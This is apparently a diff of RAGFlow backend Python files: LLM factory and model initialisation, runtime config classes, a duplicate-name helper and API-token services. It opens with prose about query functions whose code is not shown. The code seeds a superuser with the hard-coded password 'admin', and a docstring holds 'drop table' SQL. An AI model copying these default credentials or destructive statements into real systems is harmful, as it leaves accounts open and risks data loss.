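query_db and query_dict2expression define a small query convention worth spelling out: a scalar value in the query dict means equality against the f_-prefixed column, a (op, operand) tuple selects an operator from supported_operators, and order_by may be a bare field name or a (field, 'asc'|'desc') pair. A sketch of a call under that convention follows; MyJobModel is a hypothetical DataBaseModel subclass (any model with f_status and f_create_time columns would do), and the api.db.db_utils import path is an assumption about where this module lives.

    from api.db.db_utils import query_db  # assumed module path

    # Scalars mean equality (f_status == "1"); a tuple picks an operator,
    # here f_create_time > 0. Results come back newest first, 20 at a time.
    rows, total = query_db(
        MyJobModel,                        # hypothetical model class
        limit=20,
        offset=0,
        query={"status": "1", "create_time": (">", 0)},
        order_by=("create_time", "desc"),
    )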
@ -1,435 +1,184 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType, UserTenantRole
|
||||
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
|
||||
from api.db.services import UserService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
|
||||
|
||||
|
||||
def init_superuser():
|
||||
user_info = {
|
||||
"id": uuid.uuid1().hex,
|
||||
"password": "admin",
|
||||
"nickname": "admin",
|
||||
"is_superuser": True,
|
||||
"email": "admin@ragflow.io",
|
||||
"creator": "system",
|
||||
"status": "1",
|
||||
}
|
||||
tenant = {
|
||||
"id": user_info["id"],
|
||||
"name": user_info["nickname"] + "‘s Kingdom",
|
||||
"llm_id": CHAT_MDL,
|
||||
"embd_id": EMBEDDING_MDL,
|
||||
"asr_id": ASR_MDL,
|
||||
"parser_ids": PARSERS,
|
||||
"img2txt_id": IMAGE2TEXT_MDL
|
||||
}
|
||||
usr_tenant = {
|
||||
"tenant_id": user_info["id"],
|
||||
"user_id": user_info["id"],
|
||||
"invited_by": user_info["id"],
|
||||
"role": UserTenantRole.OWNER
|
||||
}
|
||||
tenant_llm = []
|
||||
for llm in LLMService.query(fid=LLM_FACTORY):
|
||||
tenant_llm.append(
|
||||
{"tenant_id": user_info["id"], "llm_factory": LLM_FACTORY, "llm_name": llm.llm_name, "model_type": llm.model_type,
|
||||
"api_key": API_KEY, "api_base": LLM_BASE_URL})
|
||||
|
||||
if not UserService.save(**user_info):
|
||||
print("\033[93m【ERROR】\033[0mcan't init admin.")
|
||||
return
|
||||
TenantService.insert(**tenant)
|
||||
UserTenantService.insert(**usr_tenant)
|
||||
TenantLLMService.insert_many(tenant_llm)
|
||||
print(
|
||||
"【INFO】Super user initialized. \033[93memail: admin@ragflow.io, password: admin\033[0m. Changing the password after logining is strongly recomanded.")
|
||||
|
||||
chat_mdl = LLMBundle(tenant["id"], LLMType.CHAT, tenant["llm_id"])
|
||||
msg = chat_mdl.chat(system="", history=[
|
||||
{"role": "user", "content": "Hello!"}], gen_conf={})
|
||||
if msg.find("ERROR: ") == 0:
|
||||
print(
|
||||
"\33[91m【ERROR】\33[0m: ",
|
||||
"'{}' dosen't work. {}".format(
|
||||
tenant["llm_id"],
|
||||
msg))
|
||||
embd_mdl = LLMBundle(tenant["id"], LLMType.EMBEDDING, tenant["embd_id"])
|
||||
v, c = embd_mdl.encode(["Hello!"])
|
||||
if c == 0:
|
||||
print(
|
||||
"\33[91m【ERROR】\33[0m:",
|
||||
" '{}' dosen't work!".format(
|
||||
tenant["embd_id"]))
|
||||
|
||||
|
||||
factory_infos = [{
|
||||
"name": "OpenAI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "Tongyi-Qianwen",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "ZHIPU-AI",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},
|
||||
{
|
||||
"name": "Ollama",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "Moonshot",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "FastEmbed",
|
||||
"logo": "",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"status": "1",
|
||||
}, {
|
||||
"name": "Xinference",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "Youdao",
|
||||
"logo": "",
|
||||
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
"status": "1",
|
||||
},{
|
||||
"name": "DeepSeek",
|
||||
"logo": "",
|
||||
"tags": "LLM",
|
||||
"status": "1",
|
||||
},
|
||||
# {
|
||||
# "name": "文心一言",
|
||||
# "logo": "",
|
||||
# "tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
|
||||
# "status": "1",
|
||||
# },
|
||||
]
|
||||
|
||||
|
||||
def init_llm_factory():
|
||||
llm_infos = [
|
||||
# ---------------------- OpenAI ------------------------
|
||||
{
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4o",
|
||||
"tags": "LLM,CHAT,128K",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-3.5-turbo",
|
||||
"tags": "LLM,CHAT,4K",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-3.5-turbo-16k-0613",
|
||||
"tags": "LLM,CHAT,16k",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-ada-002",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "whisper-1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},{
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4-32k",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[0]["name"],
|
||||
"llm_name": "gpt-4-vision-preview",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ----------------------- Qwen -----------------------
|
||||
{
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-plus",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-max-1201",
|
||||
"tags": "LLM,CHAT,6K",
|
||||
"max_tokens": 5899,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "text-embedding-v2",
|
||||
"tags": "TEXT EMBEDDING,2K",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "paraformer-realtime-8k-v1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
}, {
|
||||
"fid": factory_infos[1]["name"],
|
||||
"llm_name": "qwen-vl-max",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ---------------------- ZhipuAI ----------------------
|
||||
{
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "glm-3-turbo",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 128 * 1000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "glm-4",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 128 * 1000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "glm-4v",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 2000,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[2]["name"],
|
||||
"llm_name": "embedding-2",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ Moonshot -----------------------
|
||||
{
|
||||
"fid": factory_infos[4]["name"],
|
||||
"llm_name": "moonshot-v1-8k",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 7900,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[4]["name"],
|
||||
"llm_name": "moonshot-v1-32k",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[4]["name"],
|
||||
"llm_name": "moonshot-v1-128k",
|
||||
"tags": "LLM,CHAT",
|
||||
"max_tokens": 128 * 1000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
# ------------------------ FastEmbed -----------------------
|
||||
{
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-small-en-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-small-zh-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-base-en-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "BAAI/bge-large-en-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "sentence-transformers/all-MiniLM-L6-v2",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "nomic-ai/nomic-embed-text-v1.5",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "jinaai/jina-embeddings-v2-small-en",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 2147483648,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[5]["name"],
|
||||
"llm_name": "jinaai/jina-embeddings-v2-base-en",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 2147483648,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ Youdao -----------------------
|
||||
{
|
||||
"fid": factory_infos[7]["name"],
|
||||
"llm_name": "maidalun1020/bce-embedding-base_v1",
|
||||
"tags": "TEXT EMBEDDING,",
|
||||
"max_tokens": 512,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
# ------------------------ DeepSeek -----------------------
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-chat",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[8]["name"],
|
||||
"llm_name": "deepseek-coder",
|
||||
"tags": "LLM,CHAT,",
|
||||
"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
},
|
||||
]
|
||||
    for info in factory_infos:
        try:
            LLMFactoriesService.save(**info)
        except Exception as e:
            # save() raises on an existing primary key; swallowing the error
            # keeps repeated initialization idempotent.
            pass
    for info in llm_infos:
        try:
            LLMService.save(**info)
        except Exception as e:
            pass

    LLMFactoriesService.filter_delete([LLMFactories.name == "Local"])
    LLMService.filter_delete([LLM.fid == "Local"])
    LLMService.filter_delete([LLM.fid == "Moonshot", LLM.llm_name == "flag-embedding"])
    TenantLLMService.filter_delete([TenantLLM.llm_factory == "Moonshot", TenantLLM.llm_name == "flag-embedding"])
    LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
    LLMService.filter_delete([LLMService.model.fid == "QAnything"])
    TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
    # insert the two OpenAI embedding models for every current OpenAI user.
    print("Start to insert 2 OpenAI embedding models...")
    tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
    for tid in tenant_ids:
        for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
            row = row.to_dict()
            row["model_type"] = LLMType.EMBEDDING.value
            row["llm_name"] = "text-embedding-3-small"
            row["used_tokens"] = 0
            try:
                TenantLLMService.save(**row)
                row = deepcopy(row)
                row["llm_name"] = "text-embedding-3-large"
                TenantLLMService.save(**row)
            except Exception as e:
                pass
            break
    for kb_id in KnowledgebaseService.get_all_ids():
        KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
    """
    drop table llm;
    drop table llm_factories;
    update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One';
    alter table knowledgebase modify avatar longtext;
    alter table user modify avatar longtext;
    alter table dialog modify icon longtext;
    """


def init_web_data():
    start_time = time.time()

    init_llm_factory()
    if not UserService.get_all().count():
        init_superuser()

    print("init web data success:{}".format(time.time() - start_time))


if __name__ == '__main__':
    init_web_db()
    init_web_data()
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import time
import uuid
from copy import deepcopy

from api.db import LLMType, UserTenantRole
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
from api.db.services import UserService
from api.db.services.canvas_service import CanvasTemplateService
from api.db.services.document_service import DocumentService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
from api.db.services.user_service import TenantService, UserTenantService
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
from api.utils.file_utils import get_project_base_directory


def init_superuser():
    user_info = {
        "id": uuid.uuid1().hex,
        "password": "admin",
        "nickname": "admin",
        "is_superuser": True,
        "email": "admin@ragflow.io",
        "creator": "system",
        "status": "1",
    }
    tenant = {
        "id": user_info["id"],
        "name": user_info["nickname"] + "'s Kingdom",
        "llm_id": CHAT_MDL,
        "embd_id": EMBEDDING_MDL,
        "asr_id": ASR_MDL,
        "parser_ids": PARSERS,
        "img2txt_id": IMAGE2TEXT_MDL
    }
    usr_tenant = {
        "tenant_id": user_info["id"],
        "user_id": user_info["id"],
        "invited_by": user_info["id"],
        "role": UserTenantRole.OWNER
    }
    tenant_llm = []
    for llm in LLMService.query(fid=LLM_FACTORY):
        tenant_llm.append(
            {"tenant_id": user_info["id"], "llm_factory": LLM_FACTORY, "llm_name": llm.llm_name, "model_type": llm.model_type,
             "api_key": API_KEY, "api_base": LLM_BASE_URL})

    if not UserService.save(**user_info):
        print("\033[93m【ERROR】\033[0m can't init admin.")
        return
    TenantService.insert(**tenant)
    UserTenantService.insert(**usr_tenant)
    TenantLLMService.insert_many(tenant_llm)
    print(
        "【INFO】Super user initialized. \033[93memail: admin@ragflow.io, password: admin\033[0m. Changing the password after logging in is strongly recommended.")

    # Smoke-test the configured chat and embedding models so a bad
    # LLM_FACTORY / API_KEY setting surfaces immediately.
    chat_mdl = LLMBundle(tenant["id"], LLMType.CHAT, tenant["llm_id"])
    msg = chat_mdl.chat(system="", history=[
        {"role": "user", "content": "Hello!"}], gen_conf={})
    if msg.find("ERROR: ") == 0:
        print(
            "\33[91m【ERROR】\33[0m: ",
            "'{}' doesn't work. {}".format(
                tenant["llm_id"],
                msg))
    embd_mdl = LLMBundle(tenant["id"], LLMType.EMBEDDING, tenant["embd_id"])
    v, c = embd_mdl.encode(["Hello!"])
    if c == 0:
        print(
            "\33[91m【ERROR】\33[0m:",
            " '{}' doesn't work!".format(
                tenant["embd_id"]))


def init_llm_factory():
    try:
        # peewee expressions must be combined with "|", not Python "or":
        # "or" would short-circuit to the first expression and only delete
        # the "MiniMax" rows.
        LLMService.filter_delete([(LLM.fid == "MiniMax") | (LLM.fid == "Minimax")])
    except Exception as e:
        pass

    factory_llm_infos = json.load(
        open(
            os.path.join(get_project_base_directory(), "conf", "llm_factories.json"),
            "r",
        )
    )
    for factory_llm_info in factory_llm_infos["factory_llm_infos"]:
        llm_infos = factory_llm_info.pop("llm")
        try:
            LLMFactoriesService.save(**factory_llm_info)
        except Exception as e:
            pass
        LLMService.filter_delete([LLM.fid == factory_llm_info["name"]])
        for llm_info in llm_infos:
            llm_info["fid"] = factory_llm_info["name"]
            try:
                LLMService.save(**llm_info)
            except Exception as e:
                pass

    LLMFactoriesService.filter_delete([LLMFactories.name == "Local"])
    LLMService.filter_delete([LLM.fid == "Local"])
    LLMService.filter_delete([LLM.llm_name == "qwen-vl-max"])
    LLMService.filter_delete([LLM.fid == "Moonshot", LLM.llm_name == "flag-embedding"])
    TenantLLMService.filter_delete([TenantLLM.llm_factory == "Moonshot", TenantLLM.llm_name == "flag-embedding"])
    LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
    LLMService.filter_delete([LLMService.model.fid == "QAnything"])
    TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
    # [1 == 1] is a trivially-true filter: refresh parser_ids on every tenant.
    TenantService.filter_update([1 == 1], {
        "parser_ids": "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph,email:Email"})
    # insert the two OpenAI embedding models for every current OpenAI user.
    print("Start to insert 2 OpenAI embedding models...")
    tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
    for tid in tenant_ids:
        for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
            row = row.to_dict()
            row["model_type"] = LLMType.EMBEDDING.value
            row["llm_name"] = "text-embedding-3-small"
            row["used_tokens"] = 0
            try:
                TenantLLMService.save(**row)
                row = deepcopy(row)
                row["llm_name"] = "text-embedding-3-large"
                TenantLLMService.save(**row)
            except Exception as e:
                pass
            break
    for kb_id in KnowledgebaseService.get_all_ids():
        KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
    """
    drop table llm;
    drop table llm_factories;
    update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph';
    alter table knowledgebase modify avatar longtext;
    alter table user modify avatar longtext;
    alter table dialog modify icon longtext;
    """


def add_graph_templates():
    dir = os.path.join(get_project_base_directory(), "agent", "templates")
    for fnm in os.listdir(dir):
        try:
            cnvs = json.load(open(os.path.join(dir, fnm), "r"))
            try:
                # save() fails on an existing id, so fall back to an update;
                # together the two calls behave like an upsert.
                CanvasTemplateService.save(**cnvs)
            except:
                CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
        except Exception as e:
            print("Add graph templates error: ", e)
            print("------------", flush=True)


def init_web_data():
    start_time = time.time()

    init_llm_factory()
    if not UserService.get_all().count():
        init_superuser()

    add_graph_templates()
    print("init web data success:{}".format(time.time() - start_time))


if __name__ == '__main__':
    init_web_db()
    init_web_data()

@ -1,21 +1,21 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import operator
import time
import typing
from api.utils.log_utils import sql_logger
import peewee
@ -1,28 +1,28 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class ReloadConfigBase:
    @classmethod
    def get_all(cls):
        configs = {}
        for k, v in cls.__dict__.items():
            if not callable(getattr(cls, k)) and not k.startswith(
                    "__") and not k.startswith("_"):
                configs[k] = v
        return configs

    @classmethod
    def get(cls, config_name):
        return getattr(cls, config_name) if hasattr(cls, config_name) else None
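
A quick usage sketch of ReloadConfigBase (the subclass and its values below are made up for illustration): get_all() collects every public, non-callable class attribute, and get() is a safe getattr.

class DemoConf(ReloadConfigBase):
    HOST = "0.0.0.0"
    PORT = 9380

assert DemoConf.get_all() == {"HOST": "0.0.0.0", "PORT": 9380}
assert DemoConf.get("PORT") == 9380
assert DemoConf.get("MISSING") is None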
@ -1,54 +1,54 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from api.versions import get_versions
from .reload_config_base import ReloadConfigBase


class RuntimeConfig(ReloadConfigBase):
    DEBUG = None
    WORK_MODE = None
    HTTP_PORT = None
    JOB_SERVER_HOST = None
    JOB_SERVER_VIP = None
    ENV = dict()
    SERVICE_DB = None
    LOAD_CONFIG_MANAGER = False

    @classmethod
    def init_config(cls, **kwargs):
        for k, v in kwargs.items():
            if hasattr(cls, k):
                setattr(cls, k, v)

    @classmethod
    def init_env(cls):
        cls.ENV.update(get_versions())

    @classmethod
    def load_config_manager(cls):
        cls.LOAD_CONFIG_MANAGER = True

    @classmethod
    def get_env(cls, key):
        return cls.ENV.get(key, None)

    @classmethod
    def get_all_env(cls):
        return cls.ENV

    @classmethod
    def set_service_db(cls, service_db):
        cls.SERVICE_DB = service_db
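
A typical lifecycle sketch (argument values and the env key name are assumed for illustration): init_config() only assigns attributes that already exist on the class, so unknown keys are silently ignored.

RuntimeConfig.init_config(DEBUG=False, HTTP_PORT=9380)
RuntimeConfig.init_env()                 # merge version info from get_versions()
RuntimeConfig.get_env("RAGFLOW_VERSION")  # None if get_versions() has no such key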
@ -1,38 +1,38 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pathlib
import re
from .user_service import UserService


def duplicate_name(query_func, **kwargs):
    fnm = kwargs["name"]
    objs = query_func(**kwargs)
    if not objs:
        return fnm
    ext = pathlib.Path(fnm).suffix  # .jpg
    nm = re.sub(r"%s$" % ext, "", fnm)
    r = re.search(r"\(([0-9]+)\)$", nm)
    c = 0
    if r:
        c = int(r.group(1))
        nm = re.sub(r"\([0-9]+\)$", "", nm)
    c += 1
    nm = f"{nm}({c})"
    if ext:
        nm += f"{ext}"

    kwargs["name"] = nm
    return duplicate_name(query_func, **kwargs)
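
duplicate_name recurses until query_func finds no record with the candidate name, bumping a "(n)" counter just before the extension. A usage sketch (the service and the extra filter kwarg are assumed for illustration):

# existing names: "report.pdf", "report(1).pdf"  ->  returns "report(2).pdf"
new_name = duplicate_name(DocumentService.query, name="report.pdf", kb_id=kb_id)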
@ -1,66 +1,70 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime
import peewee
from api.db.db_models import DB, API4Conversation, APIToken, Dialog
from api.db.services.common_service import CommonService
from api.utils import current_timestamp, datetime_format


class APITokenService(CommonService):
    model = APIToken

    @classmethod
    @DB.connection_context()
    def used(cls, token):
        return cls.model.update({
            "update_time": current_timestamp(),
            "update_date": datetime_format(datetime.now()),
        }).where(
            cls.model.token == token
        )


class API4ConversationService(CommonService):
    model = API4Conversation

    @classmethod
    @DB.connection_context()
    def append_message(cls, id, conversation):
        cls.update_by_id(id, conversation)
        return cls.model.update(round=cls.model.round + 1).where(cls.model.id==id).execute()

    @classmethod
    @DB.connection_context()
    def stats(cls, tenant_id, from_date, to_date):
        return cls.model.select(
            cls.model.create_date.truncate("day").alias("dt"),
            peewee.fn.COUNT(cls.model.id).alias("pv"),
            peewee.fn.COUNT(cls.model.user_id.distinct()).alias("uv"),
            peewee.fn.SUM(cls.model.tokens).alias("tokens"),
